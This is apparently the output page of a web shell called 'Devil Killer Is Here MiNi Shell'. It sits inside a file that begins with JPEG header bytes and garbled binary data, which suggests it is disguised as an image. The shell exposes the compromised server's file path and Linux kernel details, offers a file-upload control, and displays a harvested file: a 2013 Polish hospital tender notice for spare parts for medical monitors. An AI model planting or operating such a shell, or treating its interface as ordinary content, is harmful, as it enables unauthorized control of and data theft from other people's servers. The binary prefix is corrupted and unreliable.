JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20131114/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20131114/464306-N-2013.html

<p class="kh_header"><b>Kalisz: Sukcesywne dostawy części zamiennych wielorazowego użytku do urządzeń i aparatów medycznych</b><br>
<b>Numer ogłoszenia: 464306 - 2013; data zamieszczenia: 14.11.2013</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Wojewódzki Szpital Zespolony im. Ludwika Perzyny w Kaliszu , ul. Poznańska 79, 62-800 Kalisz, woj. wielkopolskie, tel. 062 7651397, faks 062 7571323.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.szpital.kalisz.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Samodzielny publiczny zakład opieki zdrowotnej.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Sukcesywne dostawy części zamiennych wielorazowego użytku do urządzeń i aparatów medycznych.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiot zamówienia składa się z siedemnastu niepodzielnych zadań:
Zadanie nr 1 - Sukcesywne dostawy akcesorii i części eksploatacyjnych do kardiomonitorów, systemów modułowych oraz pulsoksymetrów w technologii f-my Dräger
Zadanie nr 2 - Sukcesywne dostawy akcesorii i części eksploatacyjnych do kardiomonitorów, systemów modułowych oraz pulsoksymetrów w technologii f-my GE Halthcare
Zadanie nr 3 - Sukcesywne dostawy akcesorii i części eksploatacyjnych do kardiomonitorów, systemów modułowych oraz pulsoksymetrów w technologii f-my Novametrix
Zadanie nr 4 - Sukcesywne dostawy akcesorii i części eksploatacyjnych do kardiomonitorów, systemów modułowych oraz pulsoksymetrów w technologii f-my HP Philips
Zadanie nr 5 - Sukcesywne dostawy akcesorii i części eksploatacyjnych do kardiomonitorów, systemów modułowych oraz pulsoksymetrów w technologii f-my EMTEL
Zadanie nr 6 - Sukcesywne dostawy akcesorii i części eksploatacyjnych do kardiomonitorów, systemów modułowych oraz pulsoksymetrów w technologii f-my SpaceLabs
Zadanie nr 7 - Sukcesywne dostawy akcesorii i części eksploatacyjnych do kardiomonitorów, systemów modułowych oraz pulsoksymetrów w technologii f-my Medlab
Zadanie nr 8 - Sukcesywne dostawy akcesorii i części eksploatacyjnych do kardiomonitorów, systemów modułowych oraz pulsoksymetrów w technologii f-my Nellcor
Zadanie nr 9 - Sukcesywne dostawy akcesorii i części eksploatacyjnych do kardiomonitorów, systemów modułowych oraz pulsoksymetrów w technologii f-my Nonin
Zadanie nr 10 - Sukcesywne dostawy akcesorii i części eksploatacyjnych do defibrylatorów Lifepak 20 i 20e
Zadanie nr 11 - Sukcesywne dostawy akcesorii i części eksploatacyjnych do kardiomonitorów, systemów modułowych oraz pulsoksymetrów w technologii f-my TRIDENT MED. s.c. Warszawa
Zadanie nr 12 - Sukcesywne dostawy akcesorii i części eksploatacyjnych do kardiomonitorów, systemów modułowych oraz pulsoksymetrów w technologii f-my S&W Medico Technik
Zadanie nr 13 - Sukcesywne dostawy akcesorii i części eksploatacyjnych do kardiomonitorów, systemów modułowych oraz pulsoksymetrów w technologii f-my ASPEL S.A.
Zadanie nr 14 - Sukcesywne dostawy akcesorii i części eksploatacyjnych do kardiomonitorów, systemów modułowych oraz pulsoksymetrów w technologii f-my FARUM
Zadanie nr 15 - Sukcesywne dostawy akcesorii i części eksploatacyjnych do kardiomonitorów, systemów modułowych oraz pulsoksymetrów w technologii f-my HELIGE
Zadanie nr 16 - Sukcesywne dostawy elektrod do zapisu EKG
Zadanie nr 17 - Sukcesywne dostawy akcesoriów aparatów do pomiaru NIBP.</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 34.91.30.00-0.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 17.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 12.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie wymaga wniesienia wadium</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie stawia szczególnego warunku w zakresie jego spełnienia</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie stawia szczególnego warunku w zakresie jego spełnienia</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie stawia szczególnego warunku w zakresie jego spełnienia</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie stawia szczególnego warunku w zakresie jego spełnienia</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie stawia szczególnego warunku w zakresie jego spełnienia</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>

<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków, lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenia zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><br><p class="bold">

III.5) INFORMACJA O DOKUMENTACH POTWIERDZAJĄCYCH, ŻE OFEROWANE DOSTAWY, USŁUGI LUB ROBOTY BUDOWLANE ODPOWIADAJĄ OKREŚLONYM WYMAGANIOM</p>
<p class="bold">W zakresie potwierdzenia, że oferowane roboty budowlane, dostawy lub usługi odpowiadają określonym wymaganiom należy przedłożyć:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc">
<li style="margin-bottom: 12px;"><p style="margin: 0px; padding: 0px;">inne dokumenty</p>
<p style="margin: 0px; padding: 0px;">1) materiały informacyjne (np. katalogi, foldery itp.) dotyczące oferowanego przedmiotu zamówienia, przy czym, Zamawiający sugeruje aby zaznaczyć którego oferowanego asortymentu materiały dotyczą - nr Zadania i nr pozycji Formularza Cenowego</p></li>



</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1) wypełniony i podpisany Formularz Ofertowy - druk w załączeniu do siwz, 2) wypełnione i podpisane Formularze Cenowe - druki w załączeniu do siwz, 3) oświadczenie Wykonawcy wskazujące, która część zamówienia zostanie powierzona Podwykonawcom - zgodnie z zapisami pkt. Q SIWZ, 4) pełnomocnictwo do podpisania oferty - w przypadku gdy ofertę podpisuje osoba/osoby działające na jego podstawie 5) dokument ustanawiający pełnomocnika w przypadku składania oferty wspólnej (art. 23 ustawy),</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Możliwość zmiany umowy, jakie przewiduje Zamawiający zgodnie z art. 144, ust. 1 ustawy Pzp.
  Zamawiający przewiduje możliwość zmiany postanowień przyszłej umowy w stosunku do treści oferty, na podstawie której dokonany będzie wybór Wykonawcy, w sytuacji konieczności wprowadzenia takiej zmiany wynikającej z okoliczności, których nie można było przewidzieć w chwili zawarcia umowy, tj. dopuszcza się możliwość zmiany:
              a) numeru katalogowego produktu, 
              b) nazwy produktu przy zachowaniu jego parametrów,
              c) sposobu konfekcjonowania, 
              d) liczby opakowań,
            w sytuacji, gdy zostanie wprowadzony do sprzedaży przez Producenta zmodyfikowany/udoskonalony produkt powodujący wycofanie dotychczasowego.
Powyższe zmiany nie mogą skutkować zmianami wartości umowy i być niekorzystne dla Zamawiającego.
Określenie warunków dokonania w/wym. zmiany do umowy: strona wnosząca o zmianę inicjuje zmianę pisemnie podając uzasadnienie zmiany oraz przedstawia propozycję aneksu do umowy.
- w trakcie trwania umowy nie przewiduje się zmiany cen za wyjątkiem zmiany stawki podatku VAT. W takim przypadku zmianie ulegnie wartość umowy brutto, wartość netto pozostanie bez zmian. Powyższa zmiana nie wymaga aneksu do umowy, o zmianie Wykonawca powiadomi Zamawiającego. Zmiana będzie obowiązywać od dnia wejścia w życie aktu prawnego zmieniającego stawki  podatku VAT.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.szpital.kalisz.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Wojewódzki Szpital Zespolony im. Ludwika Perzyny w Kaliszu, Adres: ul. Poznańska 79, 62-800 Kalisz, Dział Zamówień Publicznych, pok.16.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 22.11.2013 godzina 09:00, miejsce: bezwzględnie Kancelaria Zamawiającego kond. III D, pok. 10 w godz. 7:00-14:35..</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Zamawiający nie przewiduje zawarcia umowy ramowej; Zamawiający nie przewiduje udzielenia zamówienia publicznego w dynamicznym systemie zakupów.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Sukcesywne dostawy akcesorii i części eksploatacyjnych do kardiomonitorów, systemów modułowych oraz pulsoksymetrów w technologii f-my Dräger.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Sukcesywne dostawy akcesorii i części eksploatacyjnych do kardiomonitorów, systemów modułowych oraz pulsoksymetrów w technologii f-my Dräger (wielorazowy czujnik SpO2 na palec dla dorosłych, wielorazowy czujnik SpO2 typ Y dla dzieci, klips do wielorazowego czujnika SpO2 na ucho dla dzieci, kabel połączeniowy do czujnika SpO2, kabel multiparametrowy, zestaw 3 odprowadzeń pacjenta do monitorowania przebiegu  EKG typ krokodylki, wielorazowy mankiet NIBP dla dorosłych do kardiomonitorów, wielorazowy mankiet NIBP dla dzieci do kardiomonitorów)
Szczegółowy wykaz asortymentu wchodzącego w skład zadania oraz parametry-wymagania dla poszczególnego asortymentu zostały przedstawione w Formularzu Cenowym  (1) str. 24-26 SIWZ  
Oferowane wyroby muszą bezwzględnie spełniać wszystkie parametry / wymagania określone dla każdego z nich  przez Zamawiającego w Formularzach Cenowych. 
Pojedynczy egzemplarz oferowanego wyrobu oraz opakowanie zbiorcze musi być zaopatrzone w etykietę handlową, sporządzoną w języku polskim  oraz zawierającą wszystkie niezbędne informacje (nazwę producenta, nr serii, data ważności.)
Dostawa części zamiennych wielorazowego użytku do urządzeń medycznych zgodnych z art. 90 ust. 3  Ustawy z dnia 20 maja 2010r.  o Wyrobach Medycznych oraz zgodnych z opisem przedmiotu zamówienia w SIWZ. 
Oferowane wyroby muszą być dopuszczone do obrotu i stosowania na terytorium Rzeczpospolitej Polskiej  zgodnie z prawem, a w szczególności z obowiązującymi przepisami ustawy o wyrobach medycznych oraz innymi przepisami. 
Dostawy realizowane transportem Wykonawcy.
Dostawy będą realizowane w miarę potrzeb w uzgadnianych na bieżąco ilościach i asortymencie, każdorazowo na podstawie zamówień Zamawiającego składanych na zasadach uzgodnionych  w umowie.
Zamawiający przy określaniu ilości przedmiotu zamówienia dochował należytej staranności jednak faktyczna ilość zakupionych wyrobów, wielkość poszczególnych zamówień uzależniona będzie od rzeczywistych potrzeb Zamawiającego.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 34.91.30.00-0.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Sukcesywne dostawy akcesorii i części eksploatacyjnych do kardiomonitorów, systemów modułowych oraz pulsoksymetrów w technologii f-my GE Halthcare.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Sukcesywne dostawy akcesorii i części eksploatacyjnych do kardiomonitorów, systemów modułowych oraz pulsoksymetrów w technologii f-my GE Halthcare (wielorazowy gumowy czujnik SpO2 na palec dla dorosłych, kable połączeniowe do czujników SpO2, kabel połączeniowy do monitorowania przebiegu EKG z 3 lub 5 odprowadzeń, zestaw 3 odprowadzeń pacjenta do monitorowania przebiegu EKG typ krokodylki, zestaw 5 odprowadzeń pacjenta do monitorowania przebiegu EKG typ krokodylki, kabel główny pacjenta do pomiaru EKG, wielorazowy mankiet NIBP dla dorosłych do kardiomonitorów).
Szczegółowy wykaz asortymentu wchodzącego w skład zadania oraz parametry-wymagania dla poszczególnego asortymentu zostały przedstawione w Formularzu Cenowym  (2) str. 27-28 SIWZ.
Oferowane wyroby muszą bezwzględnie spełniać wszystkie parametry / wymagania określone dla każdego z nich  przez Zamawiającego w Formularzach Cenowych. 
Pojedynczy egzemplarz oferowanego wyrobu oraz opakowanie zbiorcze musi być zaopatrzone w etykietę handlową, sporządzoną w języku polskim  oraz zawierającą wszystkie niezbędne informacje (nazwę producenta, nr serii, data ważności.)
Dostawa części zamiennych wielorazowego użytku do urządzeń medycznych zgodnych z art. 90 ust. 3  Ustawy z dnia 20 maja 2010r.  o Wyrobach Medycznych oraz zgodnych z opisem przedmiotu zamówienia w SIWZ. 
Oferowane wyroby muszą być dopuszczone do obrotu i stosowania na terytorium Rzeczpospolitej Polskiej  zgodnie z prawem, a w szczególności z obowiązującymi przepisami ustawy o wyrobach medycznych oraz innymi przepisami. 
Dostawy realizowane transportem Wykonawcy.
Dostawy będą realizowane w miarę potrzeb w uzgadnianych na bieżąco ilościach i asortymencie, każdorazowo na podstawie zamówień Zamawiającego składanych na zasadach uzgodnionych  w umowie.
Zamawiający przy określaniu ilości przedmiotu zamówienia dochował należytej staranności jednak faktyczna ilość zakupionych wyrobów, wielkość poszczególnych zamówień uzależniona będzie od rzeczywistych potrzeb Zamawiającego.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 34.91.30.00-0.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Sukcesywne dostawy akcesorii i części eksploatacyjnych do kardiomonitorów, systemów modułowych oraz pulsoksymetrów w technologii f-my Novametrix.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Sukcesywne dostawy akcesorii i części eksploatacyjnych do kardiomonitorów, systemów modułowych oraz pulsoksymetrów w technologii f-my Novametrix (wielorazowy czujnik SpO2 na palec dla dorosłych, wielorazowy czujnik SpO2 typ Y dla dzieci, wielorazowy klips do czujnika SpO2 na ucho dla dzieci, kable połączeniowe do czujników SpO2).
Szczegółowy wykaz asortymentu wchodzącego w skład zadania oraz parametry-wymagania dla poszczególnego asortymentu zostały przedstawione w Formularzu Cenowym  (3) str. 29-30 SIWZ.
Oferowane wyroby muszą bezwzględnie spełniać wszystkie parametry / wymagania określone dla każdego z nich  przez Zamawiającego w Formularzach Cenowych. 
Pojedynczy egzemplarz oferowanego wyrobu oraz opakowanie zbiorcze musi być zaopatrzone w etykietę handlową, sporządzoną w języku polskim  oraz zawierającą wszystkie niezbędne informacje (nazwę producenta, nr serii, data ważności.)
Dostawa części zamiennych wielorazowego użytku do urządzeń medycznych zgodnych z art. 90 ust. 3  Ustawy z dnia 20 maja 2010r.  o Wyrobach Medycznych oraz zgodnych z opisem przedmiotu zamówienia w SIWZ. 
Oferowane wyroby muszą być dopuszczone do obrotu i stosowania na terytorium Rzeczpospolitej Polskiej  zgodnie z prawem, a w szczególności z obowiązującymi przepisami ustawy o wyrobach medycznych oraz innymi przepisami. 
Dostawy realizowane transportem Wykonawcy.
Dostawy będą realizowane w miarę potrzeb w uzgadnianych na bieżąco ilościach i asortymencie, każdorazowo na podstawie zamówień Zamawiającego składanych na zasadach uzgodnionych  w umowie.
Zamawiający przy określaniu ilości przedmiotu zamówienia dochował należytej staranności jednak faktyczna ilość zakupionych wyrobów, wielkość poszczególnych zamówień uzależniona będzie od rzeczywistych potrzeb Zamawiającego..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 34.91.30.00-0.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> Sukcesywne dostawy akcesorii i części eksploatacyjnych do kardiomonitorów, systemów modułowych oraz pulsoksymetrów w technologii f-my HP Philips.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Sukcesywne dostawy akcesorii i części eksploatacyjnych do kardiomonitorów, systemów modułowych oraz pulsoksymetrów w technologii f-my HP Philips (wielorazowy czujnik SpO2 gumowy na palec dla dorosłych, wielorazowy czujnik do  SpO2 dla niemowląt na stópkę/rękę, wielorazowy czujnik SpO2 dla dzieci na palec, wielorazowy czujnik SpO2 na ucho, nos lub wargę, kable połączeniowe do SpO2, 12 PIN, kable połączeniowe do SpO2, 9PIN, kabel główny 3 odprowadzeniowy do EKG, zestaw 3 odprowadzeń pacjenta do monitorowania przebiegu EKG typ krokodylki, wielorazowy mankiet NIBP dla dorosłych, wielorazowy mankiet NIBP dla dzieci).
Szczegółowy wykaz asortymentu wchodzącego w skład zadania oraz parametry-wymagania dla poszczególnego asortymentu zostały przedstawione w Formularzu Cenowym  (4) str. 31-32 SIWZ.
Oferowane wyroby muszą bezwzględnie spełniać wszystkie parametry / wymagania określone dla każdego z nich  przez Zamawiającego w Formularzach Cenowych. 
